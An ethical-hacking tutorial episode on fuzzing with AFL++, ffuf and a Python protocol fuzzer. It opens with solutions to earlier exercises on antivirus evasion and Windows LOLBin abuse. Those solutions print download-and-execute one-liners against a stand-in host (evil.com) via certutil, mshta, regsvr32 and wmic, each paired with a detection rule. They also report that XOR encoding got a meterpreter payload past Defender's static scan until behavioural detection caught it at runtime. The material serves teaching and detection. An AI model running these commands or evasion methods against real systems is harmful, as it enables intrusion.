Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed
Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

What will I learn
- What fuzzing is and why it finds bugs that manual testing and code review miss;
- Types of fuzzing -- dumb fuzzing, smart/grammar-based fuzzing, and coverage-guided fuzzing;
- AFL++ (American Fuzzy Lop) -- the industry-standard coverage-guided fuzzer;
- libFuzzer -- in-process fuzzing integrated into the build system;
- Web application fuzzing -- fuzzing HTTP parameters, headers, and API endpoints with ffuf;
- Protocol fuzzing -- sending malformed data to network services;
- Crash analysis and triage -- turning a crash into a vulnerability report;
- Defense: fuzzing your own software before attackers do, integrating fuzzing into CI/CD.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- GCC or Clang installed (for compiling fuzz targets);
- AFL++ installed (apt install afl++ on Debian/Ubuntu);
- The ambition to learn ethical hacking and security research.
Difficulty
- Advanced
Curriculum (of the Learn Ethical Hacking Series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
- Learn Ethical Hacking (#38) - Infrastructure as Code - Securing the Automation
- Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
- Learn Ethical Hacking (#40) - DNS Attacks - Exploiting the Internet's Foundation
- Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike
- Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own
- Learn Ethical Hacking (#43) - Exploit Development Advanced - Modern Mitigations and Bypasses
- Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries
- Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source
- Learn Ethical Hacking (#46) - The Human Factor - Why Security Training Fails
- Learn Ethical Hacking (#47) - Physical Security and OSINT - The Forgotten Attack Vectors
- Learn Ethical Hacking (#48) - Insider Threats - When the Call Is Coming from Inside the House
- Learn Ethical Hacking (#49) - Deepfakes and AI Deception - The New Social Engineering
- Learn Ethical Hacking (#50) - Red Team Operations - Simulating Real Attacks
- Learn Ethical Hacking (#51) - Incident Response - When Things Go Wrong
- Learn Ethical Hacking (#52) - Threat Intelligence - Knowing Your Enemy
- Learn Ethical Hacking (#53) - Security Architecture - Designing Systems That Resist Attack
- Learn Ethical Hacking (#54) - Compliance and Governance - The Business of Security
- Learn Ethical Hacking (#55) - Privacy and Data Protection - GDPR, CCPA, and Beyond
- Learn Ethical Hacking (#56) - Cryptocurrency Security - Attacking and Defending Digital Assets
- Learn Ethical Hacking (#57) - IoT and Embedded Security - Hacking the Physical World
- Learn Ethical Hacking (#58) - The AI Security Landscape - Attacking and Defending AI Systems
- Learn Ethical Hacking (#59) - Python for Pentesters - Automating Everything
- Learn Ethical Hacking (#60) - Zig for Security Tools - When Speed and Memory Matter
- Learn Ethical Hacking (#61) - Writing Custom Scanners - Beyond Off-the-Shelf
- Learn Ethical Hacking (#62) - C2 Frameworks - Building Command and Control
- Learn Ethical Hacking (#63) - Payload Generation and Evasion - Defeating Antivirus
- Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed (this post)
Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed
Solutions to Episode 63 Exercises
Exercise 1: Payload encoding evasion test.
Raw msfvenom payload (windows/x64/meterpreter/reverse_tcp):
Windows Defender: DETECTED (Trojan:Win32/Meterpreter)
VirusTotal: 52/72 detected
XOR-encoded + custom C loader (xor_encoder.py -> loader.c, compiled with MinGW):
Windows Defender: NOT DETECTED on initial static scan
VirusTotal: 8/72 detected (mostly heuristic-only vendors)
BUT: Defender behavioral engine caught it at RUNTIME when
shellcode allocated RWX memory and called CreateThread.
Quarantine time: 4.2 seconds after first thread execution.
Conclusion: XOR encoding bypasses static signature detection
completely -- but behavioral detection catches the RWX allocation
pattern before the payload accomplishes anything. Encoding alone
is not sufficient against a modern EDR.
The key lesson from this experiment: the detection layer that matters is NOT the signature scanner (layer 1 from episode 63's architecture overview). It is the behavioral engine (layer 3). The XOR encoder changed every byte of the payload, so the hash and byte-pattern signatures no longer matched. But the fundamental BEHAVIOR -- allocate RWX memory, copy bytes into it, execute -- is a pattern that Defender's behavioral engine recognizes regardless of what the bytes themselves contain. This is why professional evasion (as covered in episode 63) combines encoding with anti-behavioral techniques like two-step allocation, indirect syscalls, and process injection into trusted processes.
Exercise 2: LOLBins analysis (five entries from the LOLBAS project).
1. certutil.exe
Legitimate: certificate management utility
Abuse: certutil -urlcache -split -f http://evil.com/payload.exe C:\tmp\p.exe
Detection: process_creation where Image contains "certutil" AND
CommandLine contains "urlcache" OR "decode" -- rare in normal ops
2. mshta.exe
Legitimate: execute HTML Applications (.hta files)
Abuse: mshta http://evil.com/payload.hta (downloads + executes HTA)
Detection: mshta.exe with HTTP URL in CommandLine AND
ParentImage not in expected Office apps (unusual parent)
3. MSBuild.exe
Legitimate: build .NET projects from .csproj files
Abuse: inline C# task execution with embedded shellcode loader
Detection: MSBuild.exe where ParentImage NOT devenv.exe AND
NOT msbuild pipeline process -- also: short-lived process,
no actual .csproj file path in CommandLine
4. regsvr32.exe
Legitimate: register COM DLL objects (regsvr32 /s mylib.dll)
Abuse: regsvr32 /s /u /i:http://evil.com/payload.sct scrobj.dll
loads and executes remote scriptlet -- AppLocker bypass
Detection: regsvr32.exe where CommandLine contains "/i:http"
-- the URL argument is essentially never legitimate
5. wmic.exe
Legitimate: Windows Management Instrumentation query tool
Abuse: wmic process call create "cmd.exe /c payload.exe"
OR wmic os get /format:"http://evil.com/xsl.xsl"
Detection: wmic.exe where CommandLine contains "process call
create" -- or "os get /format" with a URL
The Sigma-style detection rules for LOLBins share a common pattern: they match the ABUSE syntax specifically, not the binary itself. certutil.exe launched normally for certificate inspection generates zero alerts. certutil.exe with -urlcache -split -f and a URL is something I have never seen in legitimate enterprise operations. The same goes for mshta.exe with an HTTP URL -- legitimate HTA files are local, not remote. The LOLBAS project (lolbas-project.github.io) documents exactly these abuse-vs-legitimate distinctions for 200+ Windows binaries, which is the reference for building detection rules that catch abuse without flooding your SIEM with false positives from legitimate use.
Exercise 3: Staged loader analysis.
Loader chain: xor_encoder.py -> encrypted payload hosted on
python3 -m http.server 8888 -> staged_loader.py downloads + decrypts + executes
Network indicators an EDR would see:
- Python process making HTTP request to 127.0.0.1:8888 (unusual)
- Python process downloading binary data (Content-Type: application/octet-stream)
- Python process importing ctypes (common, not suspicious alone)
Host-based indicators:
- Python process calling mmap with PROT_EXEC (rare for Python apps)
- Memory page with write+exec permissions in python3 address space
- Unusual memory allocation pattern: mmap -> write -> ctypes cast -> call
Behavioral detections that would trigger:
- ETW: executable memory page created in Python process
- Sysmon Event 10 (ProcessAccess) if injecting vs just executing in-place
- Defender memory scan: shellcode signature in python3 process heap
The staged design is clever in theory -- the encrypted payload never exists on disk, so static scanners see nothing suspicious (a Python script that imports ctypes and requests looks entirely benign). But the runtime execution creates exactly the behavioral signatures that ETW (Event Tracing for Windows, covered in episode 63's defense section) monitors at the kernel level. The mmap(PROT_EXEC) call from Python is particularly unusual -- legitimate Python programs essentially never need executable memory, so any EDR worth deploying will flag it as a high-confidence indicator of in-memory shellcode execution.
Episode 63 was about making payloads that evade antivirus. We covered static detection (signatures, hashes, YARA rules), heuristic detection (suspicious API imports, high entropy), behavioral detection (the sandbox watching what your code DOES, not what it looks like), AMSI for PowerShell, LOLBins for staying off-disk, and the EDR hook architecture that makes all of this work together. The theme across all of it: encoding and obfuscation only buy you time against static analysis. Behavioral detection catches you when you actually do something malicious, regardless of how well-disguised the payload looks.
Today we flip the script completely. Instead of delivering malicious inputs carefully, we deliver malicious inputs AUTOMATICALLY, at machine speed, in volume. We are going to throw millions of garbage inputs at software until it breaks. This is fuzzing, and it has found more vulnerabilities in critical software than any other automated technique in existence.
What Fuzzing Actually Is
Fuzzing is the art of throwing garbage at software until it breaks. Not random garbage -- intelligently mutated garbage that explores code paths the developer never anticipated.
The premise starts from an uncomfortable truth: developers test the happy path. They write unit tests for the expected inputs, integration tests for the expected workflows, and maybe a handful of edge cases they can think of off the top of their head. What they do NOT test is the unhappy universe -- the space of all possible malformed, truncated, oversized, corrupted, and structurally invalid inputs that a real-world attacker (or network blip, or buggy client) might send. That space is effectively infinite, and manual testing covers a vanishingly small fraction of it.
Fuzzers attack that untested space systematically. A fuzzer takes valid inputs (seeds), mutates them in every conceivable way (flip bits, add bytes, remove sections, swap fields, insert null bytes, generate boundary values), and feeds each mutation to the target. It does this millions of times per second. When the target crashes, hangs, or produces an error it shouldn't -- the fuzzer saves the input that caused it. You then analyze that input to find the underlying bug.
The numbers here are genuinely impressive. Google's OSS-Fuzz -- a continuous fuzzing service for critical open-source software -- has found over 10,000 bugs in 1,000+ projects since 2016, including Chrome, Firefox, OpenSSL, the Linux kernel, SQLite, curl, libpng, zlib, and hundreds more. These are mature, heavily-reviewed codebases with thousands of developer-hours of testing behind them. Fuzzing found bugs that human review missed entirely -- not because the reviewers were careless, but because the bug-triggering input was something no human tester would ever think to construct.
The reason fuzzing finds what code review misses is structural: code review checks for KNOWN bad patterns. Fuzzing discovers UNKNOWN bad behavior by exhaustive exploration. A reviewer looking at a memcpy call will check if the size parameter looks reasonable in the expected use case. A fuzzer will construct an input that makes the size parameter wrap around to a huge value when two integers are added together -- an integer overflow that triggers a heap buffer overflow that nobody was checking for.
Three Ways to Fuzz
1. Dumb (mutation-based) fuzzing
Take valid input, randomly flip bits, add bytes, remove bytes.
No knowledge of input format. Simple but surprisingly effective
against parsers and decoders that process raw bytes.
Example: take a valid PNG, randomly corrupt bytes, feed to
image parser. PNG parsers have had many bugs found this way.
2. Smart (grammar-based) fuzzing
Understand the input format. Generate inputs that are STRUCTURALLY
valid but contain malformed VALUES within valid structures.
Example: generate valid HTTP requests with overlong headers,
illegal characters in the method field, or a negative
Content-Length. The parser gets past the structure check
and crashes deeper in the logic.
3. Coverage-guided fuzzing (the modern standard)
Instrument the target binary to report which code paths execute.
The fuzzer EVOLVES inputs that trigger new code paths.
If mutation X causes the target to take a branch it has never
taken before, keep that input and mutate it further.
If mutation Y covers no new branches, discard it.
This is evolutionary optimization applied to bug discovery.
Coverage-guided fuzzing is the reason fuzzing went from a useful-but-limited technique to the dominant vulnerability discovery method in modern security research. Dumb fuzzing is effective for simple formats -- it will find crashes in image parsers, audio decoders, and document format handlers relatively quickly. But for complex protocols (TLS, SMB, QUIC) or deeply nested code paths, random mutation will spend 99% of its time on inputs that fail early validation checks and never reach the interesting code. Coverage guidance solves this by treating the fuzzing process as a search problem: find the inputs that explore the most code, then build on those. Over hours and days, a coverage-guided fuzzer accumulates a corpus of inputs that collectively exercises an enormous fraction of the target's code -- far beyond what any manual test suite achieves.
AFL++: The Industry Standard
AFL++ (American Fuzzy Lop Plus Plus) is the current reference implementation of coverage-guided fuzzing for native code. It instruments target binaries at compile time to inject branch-coverage tracking code, then runs a feedback loop: mutate, execute, check if new branches were covered, keep or discard.
# Step 1: Compile target with AFL instrumentation
afl-gcc -o target_fuzz target.c
# or with Clang (better instrumentation quality):
afl-clang-fast -o target_fuzz target.c
# Step 2: Create seed corpus (start with valid examples)
mkdir input
echo "hello world" > input/seed1.txt
echo "<html><body>test</body></html>" > input/seed2.txt
# Step 3: Run the fuzzer
afl-fuzz -i input -o output -- ./target_fuzz @@
# @@ = AFL replaces this with the path to the mutated input file
# Step 4: Monitor progress (AFL shows a live dashboard)
# Total executions (millions per hour on fast targets)
# Unique crashes found
# Code coverage (paths discovered)
# Current mutation strategy (havoc, splice, deterministic)
# Step 5: Analyze crashes
ls output/crashes/
# Each file is the input that caused a crash
# Reproduce: ./target_fuzz < output/crashes/id:000000,...
The AFL status screen deserves special attention because it tells you whether your fuzzing campaign is actually making progress. Paths discovered is the key metric -- it shows how many distinct code paths the fuzzer has found inputs for. If this number is growing steadily, the fuzzer is finding new territory to explore and your corpus is accumulating useful seeds. If it plateaus early (say, at 50 paths for a complex parser that clearly has thousands of branches), your seed corpus is probably too narrow and the fuzzer cannot mutate its way past the early validation logic -- add more diverse seeds.
Stability (shown as a percentage) indicates how consistently the target produces the same coverage bitmap for the same input. 100% means deterministic: the same input always hits the same branches. Stability below 85% often indicates multithreading, ASLR effects on branch addresses, or time-dependent behavior -- situations where the coverage signal is noisy and AFL cannot reliably determine whether a mutation found something new. Fixing stability issues (disabling threading for fuzz targets, using ASAN's determinism flags) dramatically improves fuzzing efficiency.
Executions per second varies wildly by target complexity. Simple string parsers run at 200,000-500,000 executions/second. Complex document parsers run at 5,000-50,000. Network protocol code that needs socket setup per iteration might only manage 500. Faster is always better -- more executions per hour means more of the input space explored.
Writing an AFL Fuzz Harness
AFL needs a fuzz harness -- a wrapper program that reads input from a file and passes it to the function you want to test. The quality of the harness determines the quality of the fuzzing campaign. A badly written harness that returns early on most mutations without actually exercising the target code is useless regardless of how many hours you run it.
// fuzz_harness.c -- wrap a library function for AFL fuzzing
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// The function we want to fuzz (from a library)
extern int parse_config(const char *data, size_t len);
int main(int argc, char **argv) {
// Read input from file (AFL provides via @@)
FILE *f = fopen(argv[1], "rb");
if (!f) return 1;
fseek(f, 0, SEEK_END);
long size = ftell(f);
if (size > 1024 * 1024) { fclose(f); return 1; } // limit input size
fseek(f, 0, SEEK_SET);
char *buf = malloc(size);
fread(buf, 1, size, f);
fclose(f);
// Call the function under test
parse_config(buf, size);
free(buf);
return 0;
}
# Compile with sanitizers for much better crash detection
afl-clang-fast -fsanitize=address,undefined -o fuzz_harness fuzz_harness.c -ltarget
# AddressSanitizer catches: buffer overflows, use-after-free, double-free,
# heap/stack/global buffer overflows with precise location
# UndefinedBehaviorSanitizer catches: integer overflow, null dereference,
# misaligned memory access, invalid casts
afl-fuzz -i seeds -o findings -m none -- ./fuzz_harness @@
# -m none: disable memory limit (needed with ASAN overhead)
AddressSanitizer is what transforms "the program crashed" into "the program crashed with a heap buffer overflow at offset 8 beyond a 24-byte allocation in parse_config() at line 142". Without sanitizers, a buffer overflow might not crash at all -- the program just writes past the end of its buffer into adjacent memory and keeps running, producing silent corruption. With ASAN, every out-of-bounds access triggers an immediate crash with a detailed report pinpointing the exact allocation, the access offset, and the full call stack. This makes triage dramatically faster -- you go from "something crashed" to "exploitable heap overflow in config parser" in minutes rather than hours of manual analysis.
Web Application Fuzzing with ffuf
ffuf (Fuzz Faster U Fool) is the web equivalent of AFL -- it sends millions of mutated HTTP requests to a web application and identifies responses that are different from the baseline. Unlike AFL, ffuf is black-box (no source code needed, no instrumentation), and it is built specifically for the HTTP use cases a pentester faces daily.
# Directory fuzzing (find hidden paths)
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
# Parameter fuzzing (discover hidden GET parameters)
ffuf -u "http://target.com/page?FUZZ=test" -w /usr/share/wordlists/params.txt \
-fs 4242 # filter responses with this size (baseline size for unknown params)
# POST parameter fuzzing
ffuf -u http://target.com/login -X POST \
-d "username=admin&password=FUZZ" \
-w /usr/share/wordlists/rockyou.txt \
-fc 401 # filter 401 responses (wrong password)
# Header fuzzing (find headers the app responds to differently)
ffuf -u http://target.com/ -H "X-Custom-Header: FUZZ" \
-w payloads.txt -fs 0 -mc all # show all response sizes
# Virtual host discovery (find hosts on shared infrastructure)
ffuf -u http://target.com/ -H "Host: FUZZ.target.com" \
-w subdomains.txt -fs 0
# Multi-position fuzzing (username + password simultaneously)
ffuf -u http://target.com/login -X POST \
-d "username=FUSER&password=FPASS" \
-w users.txt:FUSER -w passwords.txt:FPASS \
-fc 401 -mode clusterbomb
The response filtering options are what separate useful ffuf output from noise. Without filtering, every request returns a response and you have to manually inspect thousands of results. The -fc (filter HTTP status code), -fs (filter response size), -fl (filter line count), and -fw (filter word count) flags let you define what "normal" looks like and only show you the anomalies. A parameter that returns a response 200 bytes larger than the baseline is interesting -- it might be an undocumented parameter that does something. A path that returns 200 instead of 404 is interesting -- it exists. A header that changes the response significantly is interesting -- the application is using it for something.
Wordlist selection matters enormously. /usr/share/wordlists/dirb/common.txt has ~4,600 entries -- good for a quick check, misses a lot. SecLists (github.com/danielmiessler/SecLists) is the community-maintained reference: hundreds of wordlists covering directory names, parameter names, API paths, subdomains, common credentials, and more. The Discovery/Web-Content/raft-large-words.txt wordlist has 119,600 entries and finds things that the common wordlist misses entirely.
Protocol Fuzzing
Web fuzzing is high-level -- HTTP is a text protocol and ffuf handles the structure automatically. Protocol fuzzing means sending malformed data directly to network services at the binary level, which requires you to implement the mutation logic yourself.
#!/usr/bin/env python3
"""proto_fuzz.py -- basic protocol fuzzer for TCP services"""
import socket
import random
import sys
def generate_mutations(seed_input):
"""Generate mutated versions of valid input."""
mutations = []
# Bit flipping
for i in range(len(seed_input)):
mutated = bytearray(seed_input)
mutated[i] ^= random.randint(1, 255)
mutations.append(bytes(mutated))
# Buffer overflow attempts
for length in [256, 1024, 4096, 65535]:
mutations.append(b'A' * length)
mutations.append(seed_input + b'A' * length)
# Format string attempts
for fmt in [b'%s%s%s%s', b'%x%x%x%x', b'%n%n%n%n']:
mutations.append(fmt * 20)
# Null bytes, boundary values, special characters
mutations.append(b'\x00' * 100)
mutations.append(b'\xff' * 100)
mutations.append(seed_input.replace(b'\n', b'\r\n\r\n'))
# Integer boundary values (classic overflow triggers)
for val in [b'0', b'-1', b'2147483647', b'4294967295', b'-2147483648']:
mutations.append(val)
return mutations
def fuzz_service(host, port, seed_input, iterations=1000):
"""Send mutated inputs to a TCP service."""
crashes = []
mutations = generate_mutations(seed_input)
for i in range(iterations):
mutation = random.choice(mutations)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((host, port))
s.send(mutation)
try:
response = s.recv(4096)
except socket.timeout:
pass
s.close()
except ConnectionRefusedError:
print(f"[!] Service crashed after mutation {i}!")
crashes.append(mutation)
break
except Exception:
pass
return crashes
if __name__ == '__main__':
host = sys.argv[1]
port = int(sys.argv[2])
seed = sys.argv[3].encode() if len(sys.argv) > 3 else b'GET / HTTP/1.0\r\n\r\n'
crashes = fuzz_service(host, port, seed)
print(f"\n{len(crashes)} crashes found")
for c in crashes:
print(f" Crash input ({len(c)} bytes): {c[:100]}")
The integer boundary values deserve specific emphasis. Many crashes in network services come from integer overflows -- the server reads a length field from the packet, performs arithmetic on it (maybe multiplying by an element size, or adding to a base offset), and the result wraps around to a small or negative value. The attacker sends length=4294967295, the server computes 4294967295 * sizeof(element) and gets something close to zero due to 32-bit overflow, allocates a tiny buffer, then copies the full 4GB of "data" into it. Classic heap overflow. Testing with boundary values (INT_MAX, UINT_MAX, 0, -1) catches a surprising number of these without needing deep coverage guidance.
Crash Triage
When AFL (or your protocol fuzzer) finds a crash, you have a starting point -- not a finished finding. Crash triage is the process of turning "the program crashed with this input" into a vulnerability assessment.
# When AFL finds crashes in output/crashes/:
# 1. Reproduce the crash
./target_fuzz < output/crashes/id:000000,sig:11,src:000001,op:havoc,rep:2
# sig:11 = SIGSEGV (segmentation fault)
# sig:6 = SIGABRT (assertion failure, often ASAN or abort())
# sig:8 = SIGFPE (floating point exception, often integer divide by zero)
# 2. Get crash details with GDB (for binaries WITHOUT ASAN)
gdb -batch -ex run -ex bt -ex quit --args ./target_fuzz output/crashes/id:000000,...
# Backtrace shows WHERE the crash occurred
# 3. Detailed ASAN report (compile with -fsanitize=address first)
./target_fuzz_asan < output/crashes/id:000000,...
# ASAN output example:
# ==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
# READ of size 4 at 0x... thread T0
# #0 in parse_config() config_parser.c:142
# #1 in main() harness.c:28
# Shadow bytes around the buggy address: (shows heap layout)
# 4. Assess exploitability
# Stack buffer overflow: high -- typically RCE via return address overwrite
# Heap buffer overflow: medium-high -- exploitabiltiy depends on heap layout
# Use-after-free: high -- often leads to type confusion, code exec
# Null pointer dereference: low -- typically DoS only, not exploitable
# Integer overflow: depends -- if it leads to buffer overflow, high
# 5. Minimize the crash input (smaller = easier to analyze)
afl-tmin -i output/crashes/id:000000,... -o minimized.txt -- ./target_fuzz @@
# Removes bytes that are not necessary to trigger the crash
# A 4096-byte crash input often minimizes to 12 bytes
The crash signal is your first triage signal. SIGSEGV means the program tried to access memory it should not -- either a null pointer dereference (address near 0x0) or an out-of-bounds access to a valid-ish address. SIGABRT usually means an assertion failure or a abort() call triggered by ASAN or a CHECK() macro inside the target -- look at the abort message. SIGFPE almost always means a divide-by-zero or integer overflow feeding into arithmetic.
The ASAN output is far more useful than a raw GDB backtrace. Where GDB tells you "it crashed at address 0x7fff..." (and you have to figure out why), ASAN tells you "heap-buffer-overflow: READ of size 4, 8 bytes beyond a 24-byte allocation". That narrows the bug immediately: there is a 24-byte allocation somewhere (you can find the allocation site in the ASAN output), and code is reading 4 bytes starting at offset 32 -- 8 bytes past the end. Find the allocation, find the code that reads past it, and you have the vulnerability.
Input minimization with afl-tmin is underrated. AFL's crash inputs are often large (the mutations that found the crash may have required specific bytes scattered across a kilobyte of data). afl-tmin removes bytes one by one, testing after each removal to see if the crash still occurs. The result is the minimum input needed to trigger the bug -- which makes manual analysis much easier. Fewer bytes = cleaner understanding of what the parser is mishandling.
Defense: Fuzz Before Attackers Do
The offensive perspective on fuzzing is finding bugs in OTHER people's software. The defensive perspective is finding bugs in YOUR software before the attacker does. The same tools, completely different target.
# Integrate fuzzing into CI/CD:
# 1. OSS-Fuzz (for open-source projects -- free)
# Google runs fuzzers continuously on your project at Google scale
# Requirements: write a fuzz target, add build scripts, submit to OSS-Fuzz
# Results: bugs reported privately with 90-day disclosure deadline
# https://github.com/google/oss-fuzz
# 2. ClusterFuzzLite (GitHub Actions integration)
# Same engines as OSS-Fuzz but runs in your own CI pipeline
# No Google account needed, runs on your infrastructure
# https://google.github.io/clusterfuzzlite/
# Example GitHub Actions workflow for continuous fuzzing:
# name: Fuzz
# on: [push, pull_request, schedule]
# jobs:
# fuzz:
# runs-on: ubuntu-latest
# steps:
# - uses: actions/checkout@v3
# - name: Build fuzz targets
# run: afl-clang-fast -fsanitize=address -o fuzz_target fuzz_harness.c
# - name: Run fuzzer (1 hour per PR)
# run: |
# afl-fuzz -i corpus -o findings -V 3600 -- ./fuzz_target @@
# - name: Check for crashes
# run: |
# if [ -d findings/crashes ] && [ "$(ls findings/crashes | wc -l)" -gt 0 ]; then
# echo "Fuzzing found crashes!"
# ls -la findings/crashes/
# exit 1
# fi
# - name: Save corpus
# uses: actions/cache@v3
# with:
# path: corpus
# key: fuzz-corpus-${{ github.sha }}
# restore-keys: fuzz-corpus-
# 3. Picking good fuzz targets
# Best candidates: parsing code, protocol handlers, format decoders
# -- any code that processes external input and does complex logic
# Poor candidates: UI code, config file loading (usually simple),
# pure computation without branching on input values
The corpus caching in the CI example is more important than it looks. On the first run, the fuzzer starts from scratch and spends time rediscovering the basic code paths. On subsequent runs (stored in the cache), it starts from a corpus that already covers those paths and immediately explores deeper territory. Over weeks of CI runs, the corpus accumulates enough coverage that new mutations have to work harder to find unexplored code -- which is exactly where the interesting bugs live. Without corpus caching, every CI run starts over from zero and the fuzzing is far less effective per CPU-hour.
For target selection: not all code is equally worth fuzzing. The highest-value targets are parsers and decoders -- anything that reads external data and makes decisions based on its structure. An image parser (PNG, JPEG, WebP), a document format handler (PDF, DOCX, RTF), a network protocol implementation (TLS handshake parsing, DNS response parsing, HTTP/2 frame parsing) -- these are the functions where real-world vulnerabilities cluster, and where fuzzing has the highest yield. Code that does pure computation on validated inputs (sorting, math, string formatting with known-good data) is much less likely to have memory safety issues.
The AI Slop Connection
AI is changing fuzzing in both directions. AI-powered fuzzers use language models to generate structurally valid inputs that explore deeper code paths than random mutation -- essentially grammar-based fuzzing where the "grammar" is learned from real examples rather than hand-written. Google's research on ML-guided fuzzing has shown improvements in path coverage for complex protocols where random mutation gets stuck at early validation checks.
But AI also generates code that is particularly vulnerable to fuzzing. AI-generated parsers often lack bounds checking because the training data is full of insecure C patterns that "work" on expected inputs. AI-generated string handling uses strcpy and sprintf without length checks. AI-generated network code does not validate that a length field makes sense before using it as a malloc argument. Running a fuzzer against AI-generated code is almost guaranteed to find bugs -- usually within minutes, not hours. The code passes happy-path tests because the AI optimized for the common case. It fails catastrophically on unusual inputs because the AI never learned to consider the hostile case.
The lesson for developers: if you are shipping code -- AI-generated or otherwise -- that processes external input, fuzz it. There is no excuse for buffer overflows in new code when AFL++ finds them in 30 minutes on your laptop. The bugs that fuzzing catches are the bugs that attackers will find if you ship without testing ;-)
Exercises
Exercise 1: Install AFL++ and fuzz a simple C program. Write a function that parses a custom configuration file format (key=value lines, # for comments, [sections] for grouping). The parser should handle all three constructs and store results in a struct. Compile with afl-clang-fast and AddressSanitizer. Create 3 seed inputs (one for each feature: a comment-only file, a key=value file, a sectioned config). Fuzz for 30 minutes. Document: (a) total executions, (b) unique paths discovered, (c) any crashes found, (d) the ASAN report for the first crash if applicable. Save to ~/lab-notes/afl-exercise.md.
Exercise 2: Use ffuf to fuzz a web application in your lab (DVWA, Juice Shop, or any test app). Perform: (a) directory brute forcing against the root with raft-large-words.txt from SecLists, (b) GET parameter discovery on a known page that takes parameters (hint: try the login or search pages), (c) virtual host enumeration with a subdomains wordlist. For each run, document the filter flags you used and why. Compare ffuf's speed in executions/second against running the same wordlist with gobuster. Save to ~/lab-notes/ffuf-exercise.md.
Exercise 3: Research Google OSS-Fuzz statistics and one specific CVE found by fuzzing. Find: (a) the current total bug count and number of projects covered, (b) the top 5 projects by bugs found (check the OSS-Fuzz GitHub repo for the table), (c) the most common CWE categories in OSS-Fuzz findings (heap-buffer-overflow vs use-after-free vs others), (d) average time from bug report to fix across the project. Then pick ONE critical CVE that was discovered by automated fuzzing (Heartbleed, ImageMagick CVE-2016-3714, or any other well-documented fuzz-discovered CVE) and document: the fuzzing campaign that found it, the input that triggered it, and what code change fixed it. Save to ~/lab-notes/ossfuzz-research.md.
Congratulations @scipio! You have completed the following achievement on the Hive blockchain And have been rewarded with New badge(s)
You can view your badges on your board and compare yourself to others in the Ranking
If you no longer want to receive notifications, reply to this comment with the word
STOP